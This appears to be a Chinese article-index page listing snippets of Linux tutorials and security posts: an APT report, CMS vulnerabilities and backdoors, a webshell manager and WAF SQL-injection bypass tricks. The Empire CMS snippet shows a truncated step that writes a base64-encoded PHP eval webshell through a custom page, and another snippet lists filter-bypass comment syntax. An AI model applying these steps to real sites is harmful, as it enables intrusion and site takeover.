一、背景和主要发现Transparent Tribe(又称为PROJECTM和MYTHIC LEOPARD),是一个高产出的恶意组织,其活动最早可以追溯到2013年。Proofpoint在2016年发...
把 Linux 上的文件列表和排序玩出花来 | Linux 中国
导读:Linux 命令可以提供文件的详细信息,也可以自定义显示的文件列表,甚至可以深入到文件系统的目录中,只要你愿意看。本文字数:5090,阅读时长大约:6分钟https://linux....
凯蒂阿姨的自定义 Mac 终端 | Linux 中国
导读:开源意味着我可以在任何终端上找到熟悉的 Linux。 本文字数:2534,阅读时长大约:4分钟https://linux....
使用自定义ClassLoader解决反序列化serialVesionUID不一致问题
0x01 背景 serialVesionUid不一致导致反序列化失败也算是Java反序列化漏洞利用比较常见的问题了。查了下资料,发现了各种各样的方法,但没有找到一种适合所有gadget的通用解决方案,...
PageAdmin几个设计缺陷导致的安全漏洞
1.login_key暴力预测 2.伪造任意会员或管理留言 3.删除任意留言ps:.net开源了,相信各种特性漏洞会如雨后春笋般涌现,小菜先学点asp.net基础知识,等大牛们发特...
MetInfo(米拓)企业网站管理系被插后门
关于“MetInfo(米拓)企业网站管理系统”MetInfo企业网站管理系统采用PHP+Mysql架构,全站内置了SEO搜索引擎优化机制,支持用户自定义界面语言(全球各种语言),拥...
CKnife java版本的中国菜刀(可以自定义payload 各种代码)
CKnife java版本的中国菜刀 (可以自定义payload 各种代码) 老版的中国菜刀感觉上是无法超越的。
XDCMS企业系统最新oday(附检测工具)
X DCMS企业系统最新oday(附检测工具) 作者:mOon 博客 moonsec.com QQ:40497992 Dcms企业网站管理系统是一套完全开源的通用的内容管理系统。主...
帝国cms 6.6漏洞
自定义页面-增加自定义页面-随便写个.php文件名,内容写:<script language="php">echo base64_decode("PD9waHAgQGV...
最新WAF注入绕过
1大小写变种 2使用SQL注释 3使用URL编码 4使用空字节 5使用嵌套过剥离 6使用非标准入口点 7避开自定义过滤器 嵌套注释非注释关键字绕过 *代表注释 !代表非注释 /*!/**/and*/ ...
16